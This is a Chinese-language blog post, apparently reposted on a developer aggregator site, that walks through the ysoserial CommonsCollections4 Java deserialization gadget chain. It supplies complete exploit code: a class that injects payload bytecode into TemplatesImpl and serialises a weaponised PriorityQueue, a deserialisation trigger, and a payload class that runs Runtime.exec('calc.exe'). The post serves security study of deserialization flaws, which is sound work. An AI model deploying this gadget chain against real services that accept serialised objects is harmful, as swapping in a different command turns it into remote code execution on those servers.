主頁 > 企業開發 > java反序列化-ysoserial-除錯分析總結篇(4)

java反序列化-ysoserial-除錯分析總結篇(4)

2020-09-10 13:26:03 企業開發

1.前言

這篇文章繼續分析commoncollections4利用鏈,這篇文章是對cc2的改造,和cc3一樣,cc3是對cc1的改造,cc4則是對cc2的改造,里面chained的invoke變成了instantiateTransformer,所以不用invoke反射呼叫方法,所以外層queue里面放的元素隨意

縮減版的函式呼叫堆疊如下圖所示:

2.利用鏈分析:

呼叫還是從PriorityQueue.readObject函式開始

一直到org/apache/commons/collections4/comparators/TransformingComparator.class的compare函式中將呼叫chainedTransformer的transform方法了

這里第一個要利用的還是ConstantTransformer,要回傳TrAXfilter類

接下來第二輪將呼叫Traxfilter類入口引數型別為Templates的建構式,并且實體化呼叫該建構式傳入templatesImpl類的實體

接下來到TraxFilter的建構式中將呼叫templatesImpl.newTransformer(),就可以是實體化_bytecode中存盤的類進行rce了

 

 yso構造分析:

 

 

 首先構造一個Templates類的實體,然后開始構造chianed鏈需要的東西,首先就是一個Constanttransformer

然后再構造chained的第二個元素就是該鏈相對于cc2的區別為InstantiateTransformer類

接下來將兩個transformer放進chaind,并且構造外層的PriorityQueue,并將chined放入TransformingComparator,然后再將Templates放到instantiate實體的引數和引數型別中,至此

就構造結束了

手動exp構造:

 exp.java

package CommonsCollections4;
import  com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import javassist.*;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.ComparableComparator;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;



import javax.xml.transform.Templates;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.PriorityQueue;

public class exp {
    public static void main(String[] args) throws IOException, CannotCompileException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException, NotFoundException {
        TemplatesImpl tmp = new TemplatesImpl();
        ClassPool pool = ClassPool.getDefault();
        pool.insertClassPath(new ClassClassPath(payload.class));

        CtClass pay_class = pool.get(payload.class.getName());
        byte[] payCode = pay_class.toBytecode();
        Class clazz;
        clazz =Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
        //存盤payload類
        Field byteCode = clazz.getDeclaredField("_bytecodes");
        byteCode.setAccessible(true);
        byteCode.set(tmp,new byte[][]{payCode});
        Field name  = clazz.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(tmp,"tr1ple");

        Transformer[] trans = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(
                        new Class[]{Templates.class},
                        new Object[]{tmp})
        };


        ChainedTransformer chian = new ChainedTransformer(trans);
        //PriorityQueue<Object> queue = new PriorityQueue(2,new TransformingComparator(chian));
        TransformingComparator transCom = new TransformingComparator(chian);

        PriorityQueue queue = new PriorityQueue(2);
        queue.add(1);
        queue.add(1);


        Field com = PriorityQueue.class.getDeclaredField("comparator");
        com.setAccessible(true);
        com.set(queue,transCom);

        //序列化
        File file;
        file = new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commonscollections4.ser");
        ObjectOutputStream obj_out = new ObjectOutputStream(new FileOutputStream(file));
        obj_out.writeObject(queue);

    }
}

readobj.java

package CommonsCollections4;

import java.io.*;
import java.lang.Runtime;

public class readObj {
    public static void main(String[] args) throws IOException, ClassNotFoundException {
        File file;
        file = new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commonscollections4.ser");
        ObjectInputStream obj = new ObjectInputStream(new FileInputStream(file));
        obj.readObject();
    }
}

payload.java

package CommonsCollections4;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

public class payload extends AbstractTranslet {
    {
        try {
            Runtime.getRuntime().exec("calc.exe");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
    public payload(){
        System.out.println("tr1ple 2333");
    }

    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }

    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}

 

 









      
  

      轉載請註明出處,本文鏈接:https://www.uj5u.com/qiye/2292.html
      
標籤:訊息安全 

      
上一篇:java反序列化-ysoserial-除錯分析總結篇(3)
下一篇:leaflet 結合 geoserver 實作地圖空間查詢(附原始碼下載)

     




  

    

      

        

      

    

    

      
標籤雲

      

        
    其他(157675)        Python(38076)        JavaScript(25376)        Java(17977)        C(15215)        區塊鏈(8255)        C#(7972)        AI(7469)        爪哇(7425)        MySQL(7132)        html(6777)        基礎類(6313)        sql(6102)        熊猫(6058)        PHP(5869)        数组(5741)        R(5409)        Linux(5327)        反应(5209)        腳本語言(PerlPython)(5129)        非技術區(4971)        Android(4554)        数据框(4311)        css(4259)        节点.js(4032)        C語言(3288)        json(3245)        列表(3129)        扑(3119)        C++語言(3117)        安卓(2998)        打字稿(2995)        VBA(2789)        Java相關(2746)        疑難問題(2699)        细绳(2522)        單片機工控(2479)        iOS(2429)        ASP.NET(2402)        MongoDB(2323)        麻木的(2285)        正则表达式(2254)        字典(2211)        循环(2198)        迅速(2185)        擅长(2169)        镖(2155)        功能(1967)        .NET技术(1958)        Web開發(1951)        python-3.x(1918)        HtmlCss(1915)        弹簧靴(1913)        C++(1909)        xml(1889)        PostgreSQL(1872)        .NETCore(1853)        谷歌表格(1846)        Unity3D(1843)        for循环(1842)        

      

    

    

      
      

        









      

    

    

      
熱門瀏覽

      

        
    

  • 
        
     IEEE1588PTP在數字化變電站時鐘同步方面的應用
          
    IEEE1588ptp在數字化變電站時鐘同步方面的應用 京準電子科技官微——ahjzsz 一、電力系統時間同步基本概況 隨著對IEC 61850標準研究的不斷深入,國內外學者提出基于IEC61850通信標準體系建設數字化變電站的發展思路。數字化變電站與常規變電站的顯著區別在于程序層傳統的電流/電壓互 ......
    
           uj5u.com 2020-09-10 03:51:52 more
    
      
  • 
        
     HTTP request smuggling CL.TE
          
    CL.TE 簡介 前端通過Content-Length處理請求,通過反向代理或者負載均衡將請求轉發到后端,后端Transfer-Encoding優先級較高,以TE處理請求造成安全問題。 檢測 發送如下資料包 POST / HTTP/1.1 Host: ac391f7e1e9af821806e890 ......
    
           uj5u.com 2020-09-10 03:52:11 more
    
      
  • 
        
     網路滲透資料大全單——漏洞庫篇
          
    網路滲透資料大全單——漏洞庫篇漏洞庫 NVD ——美國國家漏洞庫 →http://nvd.nist.gov/。 CERT ——美國國家應急回應中心 →https://www.us-cert.gov/ OSVDB ——開源漏洞庫 →http://osvdb.org Bugtraq ——賽門鐵克 →ht ......
    
           uj5u.com 2020-09-10 03:52:15 more
    
      
  • 
        
     京準講述NTP時鐘服務器應用及原理
          
    京準講述NTP時鐘服務器應用及原理京準講述NTP時鐘服務器應用及原理 安徽京準電子科技官微——ahjzsz 北斗授時原理 授時是指接識訓通過某種方式獲得本地時間與北斗標準時間的鐘差,然后調整本地時鐘使時差控制在一定的精度范圍內。 衛星導航系統通常由三部分組成:導航授時衛星、地面檢測校正維護系統和用戶 ......
    
           uj5u.com 2020-09-10 03:52:25 more
    
      
  • 
        
     利用北斗衛星系統設計NTP網路時間服務器
          
    利用北斗衛星系統設計NTP網路時間服務器 利用北斗衛星系統設計NTP網路時間服務器 安徽京準電子科技官微——ahjzsz 概述 NTP網路時間服務器是一款支持NTP和SNTP網路時間同步協議,高精度、大容量、高品質的高科技時鐘產品。 NTP網路時間服務器設備采用冗余架構設計,高精度時鐘直接來源于北斗 ......
    
           uj5u.com 2020-09-10 03:52:35 more
    
      
  • 
        
     詳細解讀電力系統各種對時方式
          
    詳細解讀電力系統各種對時方式 詳細解讀電力系統各種對時方式 安徽京準電子科技官微——ahjzsz,更多資料請添加VX 衛星同步時鐘是我京準公司開發研制的應用衛星授時時技術的標準時間顯示和發送的裝置,該裝置以M國全球定位系統(GLOBAL POSITIONING SYSTEM,縮寫為GPS)或者我國北 ......
    
           uj5u.com 2020-09-10 03:52:45 more
    
      
  • 
        
     如何保證外包團隊接入企業內網安全
          
    不管企業規模的大小,只要企業想省錢,那么企業的某些服務就一定會采用外包的形式,然而看似美好又經濟的策略,其實也有不好的一面。下面我通過安全的角度來聊聊使用外包團的安全隱患問題。 先看看什么服務會使用外包的,最常見的就是話務/客服這種需要大量重復性、無技術性的服務,或者是一些銷售外包、特殊的職能外包等 ......
    
           uj5u.com 2020-09-10 03:52:57 more
    
      
  • 
        
     PHP漏洞之【整型數字型SQL注入】
          
    0x01 什么是SQL注入 SQL是一種注入攻擊,通過前端帶入后端資料庫進行惡意的SQL陳述句查詢。 0x02 SQL整型注入原理 SQL注入一般發生在動態網站URL地址里,當然也會發生在其它地發,如登錄框等等也會存在注入,只要是和資料庫打交道的地方都有可能存在。 如這里http://192.168. ......
    
           uj5u.com 2020-09-10 03:55:40 more
    
      
  • 
        
     [GXYCTF2019]禁止套娃
          
    git泄露獲取原始碼 使用GET傳參,引數為exp 經過三層過濾執行 第一層過濾偽協議,第二層過濾帶引數的函式,第三層過濾一些函式 preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'] (?R)參考當前正則運算式,相當于匹配函式里的引數 因此傳遞 ......
    
           uj5u.com 2020-09-10 03:56:07 more
    
      
  • 
        
     等保2.0實施流程
          
    流程 結論 ......
    
           uj5u.com 2020-09-10 03:56:16 more
    
      
    •         

      

    

    

      
      

        

      

    



      
最新发布

      

        
    

  • 
        
     使用Django Rest framework搭建Blog
          
    在前面的Blog例子中我們使用的是GraphQL, 雖然GraphQL的使用處于上升趨勢,但是Rest API還是使用的更廣泛一些. 所以還是決定回到傳統的rest api framework上來, Django rest framework的官網上給了一個很好用的QuickStart, 我參考Qu ......
    
           uj5u.com 2023-04-20 08:17:54 more
    
      
  • 
        
     記錄-new Date() 我忍你很久了!
          
    這里給大家分享我在網上總結出來的一些知識,希望對大家有所幫助 大家平時在開發的時候有沒被new Date()折磨過?就是它的諸多怪異的設定讓你每每用的時候,都可能不小心踩坑。造成程式意外出錯,卻一下子找不到問題出處,那叫一個煩透了…… 下面,我就列舉它的“四宗罪”及應用思考 可惡的四宗罪 1. Sa ......
    
           uj5u.com 2023-04-20 08:17:47 more
    
      
  • 
        
     使用Vue.js實作文字跑馬燈效果
          
    實作文字跑馬燈效果,首先用到 substring()截取 和 setInterval計時器 clearInterval()清除計時器 效果如下: 實作代碼如下: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta  ......
    
           uj5u.com 2023-04-20 08:12:31 more
    
      
  • 
        
     JavaScript 運算子
          
    JavaScript 運算子/運算子 在 JavaScript 中,有一些運算子可以使代碼更簡潔、易讀和高效。以下是一些常見的運算子: 1、可選鏈運算子(optional chaining operator) ?.是可選鏈運算子(optional chaining operator)。?. 可選鏈操 ......
    
           uj5u.com 2023-04-20 08:02:25 more
    
      
  • 
        
     CSS—相對單位rem
          
    一、概述 rem是一個相對長度單位,它的單位長度取決于根標簽html的字體尺寸。rem即root em的意思,中文翻譯為根em。瀏覽器的文本尺寸一般默認為16px,即默認情況下: 1rem = 16px rem布局原理:根據CSS媒體查詢功能,更改根標簽的字體尺寸,實作rem單位隨螢屏尺寸的變化,如 ......
    
           uj5u.com 2023-04-20 08:02:21 more
    
      
  • 
        
     我的第一個NPM包:panghu-planebattle-esm(胖虎飛機大戰)使用說明
          
    好家伙,我的包終于開發完啦 歡迎使用胖虎的飛機大戰包!! 為你的主頁添加色彩 這是一個有趣的網頁小游戲包,使用canvas和js開發 使用ES6模塊化開發 效果圖如下: (覺得圖片太sb的可以自己改) 代碼已開源!! Git: https://gitee.com/tang-and-han-dynas ......
    
           uj5u.com 2023-04-20 08:01:50 more
    
      
  • 
        
     如何在 vue3 中使用 jsx/tsx?
          
    我們都知道,通常情況下我們使用 vue 大多都是用的 SFC(Signle File Component)單檔案組件模式,即一個組件就是一個檔案,但其實 Vue 也是支持使用 JSX 來撰寫組件的。這里不討論 SFC 和 JSX 的好壞,這個仁者見仁智者見智。本篇文章旨在帶領大家快速了解和使用 Vu ......
    
           uj5u.com 2023-04-20 08:01:37 more
    
      
  • 
        
     【Vue2.x原始碼系列06】計算屬性computed原理
          
    本章目標:計算屬性是如何實作的?計算屬性快取原理以及洋蔥模型的應用?在初始化Vue實體時,我們會給每個計算屬性都創建一個對應watcher,我們稱之為計算屬性watcher ......
    
           uj5u.com 2023-04-20 08:01:31 more
    
      
  • 
        
     http1.1與http2.0
          
    一、http是什么 通俗來講,http就是計算機通過網路進行通信的規則,是一個基于請求與回應,無狀態的,應用層協議。常用于TCP/IP協議傳輸資料。目前任何終端之間任何一種通信方式都必須按Http協議進行,否則無法連接。tcp(三次握手,四次揮手)。 請求與回應:客戶端請求、服務端回應資料。 無狀態 ......
    
           uj5u.com 2023-04-20 08:01:10 more
    
      
  • 
        
     http1.1與http2.0
          
    一、http是什么 通俗來講,http就是計算機通過網路進行通信的規則,是一個基于請求與回應,無狀態的,應用層協議。常用于TCP/IP協議傳輸資料。目前任何終端之間任何一種通信方式都必須按Http協議進行,否則無法連接。tcp(三次握手,四次揮手)。 請求與回應:客戶端請求、服務端回應資料。 無狀態 ......
    
           uj5u.com 2023-04-20 08:00:32 more
    
      
    •         

      

    

    
    

      
      

        

      

    

  


  

    

      
Copyright © 2010-2020 有解無憂